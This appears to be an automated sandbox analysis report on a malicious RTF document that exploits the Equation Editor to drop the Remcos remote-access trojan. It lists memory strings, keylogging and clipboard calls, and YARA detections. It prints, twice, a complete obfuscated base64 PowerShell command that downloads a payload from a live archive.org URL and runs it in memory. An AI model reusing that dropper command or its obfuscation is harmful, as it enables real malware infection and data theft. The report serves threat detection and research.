              Source: powershell.exe, 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: powershell.exe, 00000008.00000002.376723049.0000000002AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000008.00000002.376569393.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cv
              Source: powershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: wscript.exe, 00000005.00000003.355492637.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355676852.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355527668.0000000002B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.dmtf.or
              Source: powershell.exe, 00000006.00000002.382634870.0000000002426000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.376723049.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000008.00000002.376723049.000000000249A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000008.00000002.376723049.000000000249A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.381278293.000000000509D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.376723049.0000000002AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000008.00000002.376723049.000000000249A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtxwp;Aonbase64Content
              Source: powershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000009_2_0040A2B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B70E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B70E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A3E0

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C9E2 SystemParametersInfoW,9_2_0041C9E2

              System Summary

              barindex
              Source: beNwFiUxpf.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3524, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167B4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029F47A8_2_0029F47A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00292C808_2_00292C80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00295EF88_2_00295EF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029EF988_2_0029EF98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029907E8_2_0029907E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029893B8_2_0029893B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002989408_2_00298940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029F27E8_2_0029F27E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029F2DD8_2_0029F2DD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029F36D8_2_0029F36D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00298BE88_2_00298BE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00298BF88_2_00298BF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029F4638_2_0029F463
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029F5028_2_0029F502
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00293D1D8_2_00293D1D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029E5E88_2_0029E5E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029E5D88_2_0029E5D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00295EE88_2_00295EE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029EF888_2_0029EF88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E0CC9_2_0043E0CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F0FA9_2_0041F0FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004541599_2_00454159
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004381689_2_00438168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004461F09_2_004461F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E2FB9_2_0043E2FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045332B9_2_0045332B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042739D9_2_0042739D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004374E69_2_004374E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E5589_2_0043E558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004387709_2_00438770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004378FE9_2_004378FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004339469_2_00433946
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044D9C99_2_0044D9C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427A469_2_00427A46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041DB629_2_0041DB62
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427BAF9_2_00427BAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00437D339_2_00437D33
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435E5E9_2_00435E5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426E0E9_2_00426E0E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DE9D9_2_0043DE9D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00413FCA9_2_00413FCA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00436FEA9_2_00436FEA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
              Source: beNwFiUxpf.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3524, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
